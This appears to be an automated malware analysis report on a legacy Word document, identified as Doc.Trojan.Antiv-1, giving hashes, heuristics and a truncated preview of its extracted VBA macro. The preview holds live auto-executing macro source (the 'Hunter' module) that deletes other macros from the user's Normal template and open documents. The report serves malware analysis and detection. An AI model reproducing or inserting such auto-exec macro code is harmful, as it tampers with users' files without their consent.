Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bb423c0efad6c914…

MALICIOUS

Office (OLE)

Size: 66.5 KB
Created: 2000-08-18 22:26:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: fbe835a48ce7fff276ba68203dc1f39c
SHA-1: 0e09502f143b49d3f62acbea07f79de649c348ca
SHA-256: bb423c0efad6c9148a7839eb8efd7ce9939461885f7be41322288444d8e455dc
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office (OLE) document containing VBA macros, including an AutoOpen macro that runs when the document is opened. The macro code suggests it tries to deceive the user into removing other macros by presenting a warning about possible viruses. This behavior is consistent with a downloader or with a component designed to evade detection. The ClamAV detection 'Doc.Trojan.Antiv-1' further supports its malicious nature.

Heuristics (4)

  • ClamAV: Doc.Trojan.Antiv-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Antiv-1
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The document contains an AutoOpen macro, which Word runs automatically when the document is opened.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface; by itself it is not a downloader or parser-CVE attribution.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  10281 bytes
SHA-256: 3dcd1eaa27766e8415636b1c05aa7e598805b411412d3ba5c30bbbe27612a642
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hunter"
Public nomearq As String
Public nomemod As String
Public frase As String
Public frase1 As String
'This virus-antivirus was created by ¥@®
Sub AutoOpen()
    antiv
    multi
    TimeT
End Sub
Sub antiv()
On Error Resume Next
Dim i As Integer
Dim mensagem, botao, titulo
    i = NormalTemplate.VBProject.VBComponents.Count
Do While NormalTemplate.VBProject.VBComponents.Count > 0
    If NormalTemplate.VBProject.VBComponents(i).Name = "Hunter" Then GoTo Salto
    If NormalTemplate.VBProject.VBComponents(i).Name = "ThisDocument" Then GoTo Salto
        frase1 = " que foi removido pelo Hunter ."
        frase = " possuia o módulo "
        nomearq = NormalTemplate.FullName
        nomemod = NormalTemplate.VBProject.VBComponents(i).Name
        mensagem = "Voçe Possui o Macro " + NormalTemplate.VBProject.VBComponents(i).Name + " em seu arquivo " + NormalTemplate.FullName + " ." + Chr(13) + Chr(13) + "Macros desse tipo pode conter vírus . . ." + Chr(13) + Chr(13) + "Deseja remover o macro . É aconselhavel . . ."
        botao = vbYesNo
        titulo = "Hunter"
        resp = MsgBox(mensagem, botao, titulo)
    If resp = vbYes Then
        Application.OrganizerDelete NormalTemplate.FullName, NormalTemplate.VBProject.VBComponents(i).Name, wdOrganizerObjectProjectItems
        arqlog
    Else
        mensagem = "Tem Certeza ??? " + Chr(13) + Chr(13) + "Alguns VÍRUS podem danificar este computador !!!" + Chr(13) + Chr(13) + "Clique 'Sim' para remover o " + NormalTemplate.VBProject.VBComponents(i).Name + " e 'Não' para manter o macro ."
        botao = vbYesNo
        titulo = "Hunter"
        resp = MsgBox(mensagem, botao, titulo)
    If resp = vbYes Then
        Application.OrganizerDelete NormalTemplate.FullName, NormalTemplate.VBProject.VBComponents(i).Name, wdOrganizerObjectProjectItems
        arqlog
    End If
    End If

Salto:
    i = i - 1
    If i < 1 Then Exit Do
Loop
    kk = ActiveDocument.VBProject.VBComponents.Count
Do While ActiveDocument.VBProject.VBComponents.Count > 0
    If ActiveDocument.VBProject.VBComponents(kk).Name = "Hunter" Then GoTo Salto1
    If ActiveDocument.VBProject.VBComponents(kk).Name = "ThisDocument" Then GoTo Salto1
        frase1 = " que foi removido pelo Hunter ."
        frase = " possuia o módulo "
        nomearq = ActiveDocument.FullName
        nomemod = ActiveDocument.VBProject.VBComponents(kk).Name
        mensagem = "Voçe Possui o Macro " + ActiveDocument.VBProject.VBComponents(kk).Name + " em seu arquivo " + ActiveDocument.FullName + " ." + Chr(13) + Chr(13) + "Macros desse tipo pode conter vírus . . ." + Chr(13) + Chr(13) + "Deseja remover o macro . É aconselhavel . . ."
        botao = vbYesNo
        titulo = "Hunter"
        resp = MsgBox(mensagem, botao, titulo)
    If resp = vbYes Then
        Application.OrganizerDelete ActiveDocument.FullName, ActiveDocument.VBProject.VBComponents(kk).Name, wdOrganizerObjectProjectItems
        arqlog
    Else
        mensagem = "Tem Certeza ??? " + Chr(13) + Chr(13) + "Alguns VÍRUS podem danificar este computador !!!" + Chr(13) + Chr(13) + "Clique 'Sim' para remover o " + ActiveDocument.VBProject.VBComponents(kk).Name + " e 'Não' para manter o macro ."
        botao = vbYesNo
        titulo = "Hunter"
        resp = MsgBox(mensagem, botao, titulo)
    If resp = vbYes Then
        Application.OrganizerDelete ActiveDocument.FullName, ActiveDocument.VBProject.VBComponents(kk).Name, wdOrganizerObjectProjectItems
        arqlog
    End If
    End If
Salto1:
    kk = kk - 1
    If kk < 1 Then Exit Do
Loop

On Error GoTo msgarq
SetAttr "c:\msg", 0
Open "c:\msg" For Input As #1
        Do Until EOF(1)
            Input #1, MM
        Loop
    Close #1
If MM = "sim" Then
    aa = 
... (truncated)